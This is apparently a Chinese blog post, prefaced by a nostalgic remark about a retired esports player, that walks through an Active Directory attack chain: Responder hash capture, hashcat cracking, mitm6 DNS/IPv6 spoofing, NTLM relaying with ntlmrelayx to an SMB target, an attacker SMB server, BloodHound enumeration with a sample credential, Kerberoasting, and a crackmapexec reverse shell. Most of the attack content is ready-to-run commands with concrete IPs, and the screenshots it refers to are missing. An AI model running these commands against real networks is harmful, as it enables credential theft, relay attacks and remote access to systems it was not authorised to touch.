昨日听闻uzi退役,心里便十分失落,我不打LOL,但是很喜欢看LPL,于是水文一篇,纪念青春。
首先使用responder进行监听:
responder -I vmnet0
获取到hash:
使用hashcat破解hash得到明文密码,或者后续进行ntlmreply:
除此之外我们还能使用mitm6进行dns、ipv6欺骗:
python mitm6.py -d offensive.org
Dns成功被欺骗:
然后另开一个终端做如下操作:
python3 ntlmrelayx.py -wh 192.168.0.9 -t smb://192.168.0.84/ -i
除了这种之外,依然可以使用下面的方法获取到hash:
python3 ntlmrelayx.py -wh 192.168.0.9 -t smb://192.168.0.84/ --no-smb-server -c "net use \\192.168.0.9\"
python3 smbserver.py -smbsupport SMB /root
此时我们可以去破解hash,也可以使用上面的方法无文件上线session。
然后使用上面的hash来进行操作,使用猎犬:
python3 bloodhound.py -d offensive.org -u kss -p abc123! -gc dm.offensive.org -c all
获取到目标的信息。
拿到之后,我们可以尝试Kerberoasting攻击。
没有的话,也没关系,我们可以使用crackmapexec进行反弹shell.
然后我们就获得了一个简单的主机会话。